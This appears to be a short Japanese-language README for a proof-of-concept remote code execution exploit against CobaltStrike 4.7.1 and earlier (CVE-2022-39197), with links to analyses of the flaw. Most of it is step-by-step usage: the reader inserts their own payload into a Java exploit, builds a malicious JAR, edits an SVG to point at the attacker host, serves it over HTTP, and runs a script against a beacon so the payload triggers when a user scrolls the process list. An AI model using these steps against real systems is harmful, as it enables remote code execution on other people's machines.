
CobaltStrike <= 4.7.1 RCE
EvilJar/src/main/java/Exploit.java 内の Line 19 を自分のペイロードに編集しますmvn clean compile assembly:singleEvilJar-1.0-jar-with-dependencies.jar を EvilJar/target/ から serve/ フォルダーへ移動しますserve\evil.svg を編集し、[attacker] を置き換えますpython3 -m http.server 8080 で配信しますpython3 cve-2022-39197.py beacon.exe http://10.10.10.2:8080/evil.svg
ユーザーがプロセスリストをスクロールするとすぐに、ペイロードがトリガーされます

https://mp.weixin.qq.com/s/Eb0pQ-1ebLSKPUFC7zS6dg — この脆弱性の詳細な分析が掲載されています https://www.agarri.fr/blog/archives/2012/05/11/svg_files_and_java_code_execution/index.html